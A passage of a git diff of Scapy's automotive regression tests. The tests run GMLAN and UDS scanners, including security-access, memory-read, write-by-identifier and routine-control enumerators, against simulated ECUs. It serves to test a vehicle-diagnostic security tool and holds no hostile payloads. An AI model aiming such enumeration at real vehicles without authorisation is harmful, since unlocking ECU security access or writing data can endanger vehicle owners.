"basecls":GMLAN}, count=200, opened_socket=sock, timeout=6) ecu = session.ecu assert len(ecu.supported_responses) == 0 diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 595869d6475..fdd19cde9aa 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -34,11 +34,14 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg tester = TestSocket(GMLAN) ecu.pair(tester) answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) + def reset(): + answering_machine.reset_state() + sniff(timeout=0.01, opened_socket=[ecu, tester]) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: scanner = GMLAN_Scanner( - tester, reset_handler=answering_machine.reset_state, + tester, reset_handler=reset, test_cases=enumerators, timeout=0.5, retry_if_none_received=True, unittest=True, delay_state_change=0, **kwargs) scanner.scan(timeout=200) @@ -50,7 +53,8 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg = Load packets from candump -pkts = rdcandump(scapy_path("test/pcaps/candump_gmlan_scanner.log.gz")) +conf.contribs['CAN']['swap-bytes'] = True +pkts = rdpcap(scapy_path("test/pcaps/candump_gmlan_scanner.pcap.gz")) assert len(pkts) = Create GMLAN messages from packets @@ -147,6 +151,10 @@ assert scanner.scan_completed tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + + assert len(tc.results_with_negative_response) == 256 - 4 assert len(tc.results_with_positive_response) == 4 assert len(tc.scanned_states) == 1 @@ -203,6 +211,10 @@ assert scanner.scan_completed tc = scanner.configuration.test_cases[0][0] assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + + assert len(tc.results_with_negative_response) == 256 - 4 assert len(tc.results_with_positive_response) == 4 assert len(tc.scanned_states) == 1 @@ -226,6 +238,10 @@ assert 0xff in ids tc = scanner.configuration.test_cases[0][1] assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + + assert len(tc.results_with_negative_response) == 0 assert len(tc.results_with_positive_response) == 4 assert len(tc.scanned_states) == 1 @@ -256,6 +272,10 @@ assert scanner.scan_completed tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + + assert len(tc.results_with_negative_response) == 0x200 - 4 assert len(tc.results_with_positive_response) == 4 assert len(tc.scanned_states) == 1 @@ -286,6 +306,10 @@ assert scanner.scan_completed tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + + assert len(tc.results_with_negative_response) == 0 assert len(tc.results_with_positive_response) == 2 assert len(tc.scanned_states) == 2 @@ -306,6 +330,10 @@ assert scanner.scan_completed tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + + assert len(tc.results_with_negative_response) == 256 - 4 assert len(tc.results_with_positive_response) == 4 assert len(tc.scanned_states) == 1 @@ -347,6 +375,10 @@ assert scanner.scan_completed tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + + assert len(tc.results_with_negative_response) == 0x1ff - 4 assert len(tc.results_with_positive_response) == 4 assert len(tc.scanned_states) == 1 @@ -356,12 +388,27 @@ result = tc.show(dump=True) assert "RequestOutOfRange received " in result = Simulate ECU and test GMLAN_RMBAEnumerator 1 +~ not_pypy conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 2 memory = dict() -for addr in itertools.chain(range(0x800), range(0xf000, 0xf800), range(0xa100, 0xaf00), range(0x3000, 0x3f00)): +mem_areas = [(0x100, 0x1f00), (0xd000, 0xff00), (0xa000, 0xc000), (0x3000, 0x5f00)] + +mem_ranges = [range(s, e) for s, e in mem_areas] + +mem_inner_borders = [s for s, _ in mem_areas] +mem_inner_borders += [e - 1 for _, e in mem_areas] + +mem_outer_borders = [s - 1 for s, _ in mem_areas] +mem_outer_borders += [e for _, e in mem_areas] + +mem_random_test_points = [] +for _ in range(100): + mem_random_test_points += [random.choice(list(itertools.chain(*mem_ranges)))] + +for addr in itertools.chain(*mem_ranges): memory[addr] = addr & 0xff def answers_rmba(resp, req): @@ -390,7 +437,7 @@ assert scanner.scan_completed tc1 = scanner.configuration.test_cases[0] assert len(tc1.results_without_response) < 10 -assert len(tc1.results_with_negative_response) > 80 +assert len(tc1.results_with_negative_response) > 10 assert len(tc1.results_with_positive_response) > 50 assert len(tc1.scanned_states) == 1 @@ -398,40 +445,24 @@ result = tc1.show(dump=True) assert "RequestOutOfRange received " in result -################################################### -scanner = executeScannerInVirtualEnvironment(resps, [GMLAN_RMBAEnumerator]) - -assert scanner.scan_completed -tc2 = scanner.configuration.test_cases[0] - -assert len(tc2.results_without_response) < 10 -assert len(tc2.results_with_negative_response) > 80 -assert len(tc2.results_with_positive_response) > 50 -assert len(tc2.scanned_states) == 1 -result = tc2.show(dump=True) - -assert "RequestOutOfRange received " in result +def _get_memory_addresses_from_results(results): + mem_areas = [ + range(tup.req.memoryAddress, tup.req.memoryAddress + tup.req.memorySize) + for tup in results] + return set(list(itertools.chain.from_iterable(mem_areas))) ############################################################ -addrs = [t.req.memoryAddress for t in tc1.results_with_positive_response] + \ - [t.req.memoryAddress for t in tc2.results_with_positive_response] +addrs = _get_memory_addresses_from_results(tc1.results_with_positive_response) + +print([tp in addrs for tp in mem_inner_borders].count(True) / len(mem_inner_borders)) +assert [tp in addrs for tp in mem_inner_borders].count(True) / len(mem_inner_borders) > 0.8 +print([tp in addrs for tp in mem_random_test_points].count(True) / len(mem_random_test_points)) +assert [tp in addrs for tp in mem_random_test_points].count(True) / len(mem_random_test_points) > 0.8 +print([tp not in addrs for tp in mem_outer_borders].count(True) / len(mem_outer_borders)) +assert [tp not in addrs for tp in mem_outer_borders].count(True) / len(mem_outer_borders) > 0.8 -assert 0 in addrs -assert 0x10 in addrs -assert 0x7f0 in addrs -assert 0x3000 in addrs -assert 0x3ef0 in addrs -assert 0xa100 in addrs -assert 0xa1f0 in addrs -assert 0xa200 in addrs -assert 0xaef0 in addrs -assert 0xf000 in addrs -assert 0xf7f0 in addrs -assert 0xf800 not in addrs -assert 0xeff0 not in addrs -assert 0x2000 not in addrs = Simulate ECU and test GMLAN_RMBAEnumerator 2 * This test takes very long to execute @@ -454,6 +485,10 @@ assert scanner.scan_completed tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + + assert len(tc.results_with_negative_response) > 350 assert len(tc.results_with_positive_response) > 50 assert len(tc.scanned_states) == 1 diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts new file mode 100644 index 00000000000..4ae8caf7979 --- /dev/null +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -0,0 +1,874 @@ +% Regression tests for Simulated ECUs and UDS Scanners + ++ Configuration +~ conf + += Imports +import io +import pickle +from scapy.contrib.isotp import ISOTPMessageBuilder +from test.testsocket import TestSocket, cleanup_testsockets + +############ +############ ++ Load general modules + += Load contribution layer + + +from scapy.contrib.automotive.uds import * +from scapy.contrib.automotive.uds_ecu_states import * +from scapy.contrib.automotive.uds_scan import * +from scapy.contrib.automotive.ecu import * +load_layer("can") + + += Define Testfunction + +conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.0 + +def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwargs): + ecu = TestSocket(UDS) + tester = TestSocket(UDS) + def reset(): + answering_machine.state.reset() + answering_machine.state["session"] = 1 + sniff(timeout=0.01, opened_socket=[ecu, tester]) + ecu.pair(tester) + answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=UDS, verbose=False) + sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) + sim.start() + try: + scanner = UDS_Scanner( + tester, reset_handler=reset, test_cases=enumerators, timeout=0.5, + retry_if_none_received=True, unittest=True, delay_state_change=0, + **kwargs) + scanner.scan(timeout=200) + finally: + tester.send(Raw(b"\xff\xff\xff")) + sim.join(timeout=2) + if six.PY3 and LINUX: + pickle_test(scanner) + return scanner + +def pickle_test(scanner): + f = io.BytesIO() + pickle.dump(scanner, f) + unp = pickle.loads(f.getvalue()) + assert scanner.scan_completed == unp.scan_completed + assert scanner.state_paths == unp.state_paths + += Load packets from pcap + +conf.contribs['CAN']['swap-bytes'] = True +pkts = rdpcap(scapy_path("test/pcaps/candump_uds_scanner.pcap.gz")) +assert len(pkts) + += Create UDS messages from packets + +builder = ISOTPMessageBuilder(basecls=UDS, use_ext_addr=False, did=[0x641, 0x651]) +msgs = list() + +for p in pkts: + if p.data == b"ECURESET": + msgs.append(p) + else: + builder.feed(p) + if len(builder): + msgs.append(builder.pop()) + +assert len(msgs) + += Create ECU-Clone from packets + +mEcu = Ecu(logging=False, verbose=False, store_supported_responses=True) + +for p in msgs: + if isinstance(p, CAN) and p.data == b"ECURESET": + mEcu.reset() + else: + mEcu.update(p) + +assert len(mEcu.supported_responses) + += Test UDS_SAEnumerator evaluate_response + +e = UDS_SAEnumerator() + +config = {} + +s = EcuState(session=1) + +assert False == e._evaluate_response(s, UDS(b"\x27\x01"), None, **config) +config = {"exit_if_service_not_supported": True} +assert e._retry_pkt[s] == None +assert True == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x7f\x27\x11"), **config) +assert e._retry_pkt[s] == None +assert True == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x7f\x27\x24"), **config) +assert e._retry_pkt[s] == UDS(b"\x27\x01") +assert False == e._evaluate_response(s, UDS(b"\x27\x02"), UDS(b"\x7f\x27\x24"), **config) +assert e._retry_pkt[s] is None +assert True == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x7f\x27\x37"), **config) +assert e._retry_pkt[s] == UDS(b"\x27\x01") +assert False == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x7f\x27\x37"), **config) +assert e._retry_pkt[s] == None +assert True == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x67\x01ab"), **config) +assert e._retry_pkt[s] == None +assert False == e._evaluate_response(s, UDS(b"\x27\x01"), UDS(b"\x67\x02ab"), **config) +assert e._retry_pkt[s] == None + + + += Simulate ECU and run Scanner + +scanner = executeScannerInVirtualEnvironment( + mEcu.supported_responses, + [UDS_SA_XOR_Enumerator, UDS_DSCEnumerator, UDS_ServiceEnumerator], + UDS_DSCEnumerator_kwargs={"scan_range": range(5)}, + UDS_SA_XOR_Enumerator_kwargs={"scan_range": range(5)}) + +assert len(scanner.state_paths) == 5 +assert scanner.scan_completed + +assert EcuState(session=1) in scanner.final_states +assert EcuState(session=2, tp=1) in scanner.final_states +assert EcuState(session=3, tp=1) in scanner.final_states +assert EcuState(session=2, tp=1, security_level=2) in scanner.final_states +assert EcuState(session=3, tp=1, security_level=2) in scanner.final_states + +#################### UDS_SA_XOR_Enumerator ################ +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 19 +assert len(tc.results_with_positive_response) == 6 +assert len(tc.scanned_states) == 5 + +result = tc.show(dump=True) + +assert "serviceNotSupportedInActiveSession received 5 times" in result +assert "incorrectMessageLengthOrInvalidFormat received 14 times" in result + +################# UDS_DSCEnumerator ##################### +tc = scanner.configuration.test_cases[1] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 17 +assert len(tc.results_with_positive_response) == 8 +assert len(tc.scanned_states) == 5 + +result = tc.show(dump=True) + +assert "incorrectMessageLengthOrInvalidFormat received 17 times" in result + +###################### UDS_ServiceEnumerator ################### +tc = scanner.configuration.test_cases[2] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 640 +assert len(tc.results_with_positive_response) == 0 +assert len(tc.scanned_states) == 5 + +result = tc.show(dump=True) + +assert "incorrectMessageLengthOrInvalidFormat received 34 times" in result +assert "serviceNotSupported received 585 times" in result +assert "serviceNotSupportedInActiveSession received 19 times" in result +assert "securityAccessDenied received 2 times" in result + += UDS_RDBIEnumerator + +resps = [EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"beef2")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=3)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="ReadDataByIdentifier")])] + +es = [UDS_RDBIEnumerator] + +scanner = executeScannerInVirtualEnvironment( + resps, es, UDS_RDBIEnumerator_kwargs={"scan_range": range(0x100)}) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 256 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "asdfbeef1" in result +assert "beef2" in result +assert "beef3" in result +assert "beefff" in result +assert "subFunctionNotSupported received" in result + +ids = [t.req.identifiers[0] for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + += UDS_RDBISelectiveEnumerator + +resps = [EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x101)/Raw(b"asdfbeef1")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x102)/Raw(b"beef2")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x103)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x104)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x105)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x106)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x107)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x108)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x109)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x110)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x111)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x112)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x113)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x114)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x115)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x116)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x117)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x118)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x119)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x120)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x121)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x122)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x123)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x124)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x125)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x126)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x127)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x128)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x129)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x130)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x131)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x132)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x133)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x134)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x135)/Raw(b"beef35")]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="ReadDataByIdentifier")])] + +es = [UDS_RDBISelectiveEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.stages[0][0] + +tc.show() + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) > 1000 +assert len(tc.results_with_positive_response) >= 1 +assert len(tc.scanned_states) == 1 + +assert scanner.scan_completed +tc = scanner.configuration.stages[0][1] + +tc.show() + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 29 +assert len(tc.results_with_positive_response) == 35 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "asdfbeef1" in result +assert "beef2" in result +assert "beef3" in result +assert "beef35" in result +assert "subFunctionNotSupported received" in result + +ids = [t.req.identifiers[0] for t in tc.results_with_positive_response] + +assert 0x101 in ids +assert 0x102 in ids +assert 0x103 in ids +assert 0x135 in ids + += UDS_WDBIEnumerator + +def wdbi_handler(resp, req): + if req.service != 0x2E: + return False + assert req.dataIdentifier in [1, 2, 3, 0xff] + resp.dataIdentifier = req.dataIdentifier + if req.dataIdentifier == 1: + assert req.load == b'asdfbeef1' + return True + if req.dataIdentifier == 2: + assert req.load == b'beef2' + return True + if req.dataIdentifier == 3: + assert req.load == b"beef3" + return True + if req.dataIdentifier == 0xff: + assert req.load == b"beefff" + return True + return False + +resps = [EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"beef2")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=3)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_WDBIPR()], answers=wdbi_handler), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="ReadDataByIdentifier")])] + +es = [UDS_WDBISelectiveEnumerator()] + +scanner = executeScannerInVirtualEnvironment( + resps, es, UDS_RDBIEnumerator_kwargs={"scan_range": range(0x100)}) + +assert scanner.scan_completed +tc = scanner.configuration.stages[0][0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 256 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "asdfbeef1" in result +assert "beef2" in result +assert "beef3" in result +assert "beefff" in result +assert "subFunctionNotSupported received" in result + +ids = [t.req.identifiers[0] for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + +######################### WDBI ############################# +tc = scanner.configuration.stages[0][1] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 0 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +ids = [t.req.dataIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + += UDS_WDBIEnumerator 2 + +def wdbi_handler(resp, req): + if req.service != 0x2E: + return False + assert req.dataIdentifier in [1, 2, 3, 0xff] + resp.dataIdentifier = req.dataIdentifier + if req.dataIdentifier == 1: + assert req.load == b'asdfbeef1' + return True + if req.dataIdentifier == 2: + assert req.load == b'beef2' + return True + if req.dataIdentifier == 3: + assert req.load == b"beef3" + return True + if req.dataIdentifier == 0xff: + assert req.load == b"beefff" + return True + return False + +resps = [EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"beef2")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=3)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_WDBIPR()], answers=wdbi_handler), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="ReadDataByIdentifier")])] + +es = [UDS_WDBISelectiveEnumerator] + +scanner = executeScannerInVirtualEnvironment( + resps, es, UDS_RDBIEnumerator_kwargs={"scan_range": range(0x100)}) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0][0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 256 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "asdfbeef1" in result +assert "beef2" in result +assert "beef3" in result +assert "beefff" in result +assert "subFunctionNotSupported received" in result + +ids = [t.req.identifiers[0] for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + +######################### WDBI ############################# +tc = scanner.configuration.test_cases[0][1] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 0 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +ids = [t.req.dataIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + + += UDS_TPEnumerator + +resps = [EcuResponse(None, [UDS()/UDS_TPPR()]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="serviceNotSupported", requestServiceId="TesterPresent")])] + +es = [UDS_TPEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 0 +assert len(tc.results_with_positive_response) == 2 +assert len(tc.scanned_states) == 2 + +assert tc.show(dump=True) + += UDS_EREnumerator + +resps = [EcuResponse(None, [UDS()/UDS_ERPR(resetType=1)]), + EcuResponse(None, [UDS()/UDS_ERPR(resetType=3)]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="ECUReset")])] + +es = [UDS_EREnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 256 - 2 +assert len(tc.results_with_positive_response) == 2 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "hardReset" in result +assert "softReset" in result +assert "subFunctionNotSupported received" in result + +ids = [t.req.resetType for t in tc.results_with_positive_response] + +assert 1 in ids +assert 3 in ids + + += UDS_CCEnumerator + +resps = [EcuResponse(None, [UDS()/UDS_CCPR(controlType=1)]), + EcuResponse(None, [UDS()/UDS_CCPR(controlType=3)]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="CommunicationControl")])] + +es = [UDS_CCEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 256 - 2 +assert len(tc.results_with_positive_response) == 2 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "enableRxAndDisableTx" in result +assert "disableRxAndTx" in result +assert "subFunctionNotSupported received" in result + +ids = [t.req.controlType for t in tc.results_with_positive_response] + +assert 1 in ids +assert 3 in ids + += UDS_RDBPIEnumerator + +UDS_RDBPI.periodicDataIdentifiers[1] = "identifierElectric" +UDS_RDBPI.periodicDataIdentifiers[3] = "identifierGas" + +resps = [EcuResponse(None, [UDS()/UDS_RDBPIPR(periodicDataIdentifier=1, dataRecord=b'electric')]), + EcuResponse(None, [UDS()/UDS_RDBPIPR(periodicDataIdentifier=3, dataRecord=b'gas')]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="ReadDataPeriodicIdentifier")])] + +es = [UDS_RDBPIEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 256 - 2 +assert len(tc.results_with_positive_response) == 2 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "electric" in result +assert "gas" in result +assert "0x01 identifierElectric" in result +assert "0x03 identifierGas" in result +assert "subFunctionNotSupported received" in result + +ids = [t.req.periodicDataIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 3 in ids + + += UDS_RCEnumerator + +resps = [EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=2, routineIdentifier=2)/Raw(b"beef2")]), + EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=3, routineIdentifier=3)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="RoutineControl")])] + +es = [UDS_RCEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RCEnumerator_kwargs={"scan_range": range(0x100)}) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 0x100 * 3 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "subFunctionNotSupported received" in result + +ids = [t.req.routineIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + + += UDS_RCSelectiveEnumerator + +resps = [EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=2, routineIdentifier=1)/Raw(b"beef2")]), + EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=3, routineIdentifier=1)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="RoutineControl")])] + +es = [UDS_RCSelectiveEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RCStartEnumerator_kwargs={"scan_range": range(0x100)}) + +assert scanner.scan_completed +tc = scanner.configuration.stages[0][0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 0x100 - 2 +assert len(tc.results_with_positive_response) == 2 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "subFunctionNotSupported received" in result + +ids = [t.req.routineIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 0xff in ids + +tc = scanner.configuration.stages[0][1] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +assert len(tc.results_with_negative_response) == 1016 +assert len(tc.results_with_positive_response) == 2 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "subFunctionNotSupported received" in result + +ids = [t.req.routineIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids + += UDS_IOCBIEnumerator + +resps = [EcuResponse(None, [UDS()/UDS_IOCBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [UDS()/UDS_IOCBIPR(dataIdentifier=2)/Raw(b"beef2")]), + EcuResponse(None, [UDS()/UDS_IOCBIPR(dataIdentifier=3)/Raw(b"beef3")]), + EcuResponse(None, [UDS()/UDS_IOCBIPR(dataIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="InputOutputControlByIdentifier")])] + +es = 